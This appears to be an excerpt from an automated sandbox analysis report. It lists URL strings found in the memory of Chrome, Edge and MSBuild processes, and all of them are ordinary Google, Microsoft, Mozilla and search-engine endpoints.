Source: chromecache_168.7.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000005.00000003.1612543251.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1611527214.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1612578328.0000123802970000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743794407.00007BAC00374000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1740334856.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.cn/auth/cookie/silentpassport
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp, chromecache_168.7.dr, chromecache_165.7.dr String found in binary or memory: https://apis.google.com
Source: msedge.exe, 00000009.00000003.1787499005.00007BAC027AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/common.fd6d811d83dd3b0c7b4f.js
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754775930.00007BAC028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754391416.00007BAC01CE4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754573554.00007BAC02968000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754803717.00007BAC029C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1753974560.00007BAC028EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754447420.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bingretailmsndata.azureedge.net/msndata/
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msedge.exe, 00000009.00000003.1752802941.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrole.g
Source: msedge.exe, 00000009.00000003.1762745938.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.co
Source: msedge.exe, 00000009.00000003.1752802941.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.co8
Source: msedge.exe, 00000009.00000003.1752083653.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: msedge.exe, 00000009.00000003.1744038243.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1751870106.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1756439726.00007BAC021A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1748041920.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1748896730.00007BAC0260C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1744137382.00007BAC006D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1751010732.00007BAC021A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1756409493.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1760529042.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1755167981.00007BAC027E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1752566198.00007BAC021A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1749888201.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1744792503.00007BAC007F0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764665362.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1749629994.00007BAC021A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1755578135.00007BAC006D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1744687066.00007BAC007E0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1764712800.00007BAC006D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1747383933.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1744751563.00007BAC02194000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1749508285.00007BAC021AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore/
Source: msedge.exe, 00000009.00000003.1738803679.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737860185.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737491733.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000005.00000003.1614571580.0000123802E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615143243.0000123802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1616242346.0000123802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1614541984.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1614620498.0000123803064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1613431845.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618476289.0000123802E8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1613677644.0000123802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618672537.0000123803064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1625346370.0000123802EA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618311202.0000123802EA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: msedge.exe, 00000009.00000003.1748226713.00007BAC025CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoress
Source: msedge.exe, 00000009.00000003.1738803679.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737860185.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1737491733.00007BAC0093C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreure
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000005.00000003.1594553853.00002F04002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1594571758.00002F04002E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000005.00000003.1612419052.000012380255C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chromecache_168.7.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_168.7.dr String found in binary or memory: https://content.googleapis.com
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: MSBuild.exe, 00000002.00000002.1994278216.0000000003C39000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1994278216.0000000003D1E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.1987744561.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, gvk6ph.2.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754195245.00007BAC02580000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754775930.00007BAC028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754142197.00007BAC027F4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754391416.00007BAC01CE4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754573554.00007BAC02968000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754803717.00007BAC029C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1753974560.00007BAC028EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754447420.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754351019.00007BAC02964000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754195245.00007BAC02580000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754775930.00007BAC028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754142197.00007BAC027F4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754391416.00007BAC01CE4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754573554.00007BAC02968000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754803717.00007BAC029C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1753974560.00007BAC028EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754447420.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754351019.00007BAC02964000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000005.00000003.1649895511.0000123803E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649849557.0000123803E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000005.00000003.1649895511.0000123803E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649849557.0000123803E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/ogl
Source: chromecache_168.7.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000005.00000003.1607796346.00001238026B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
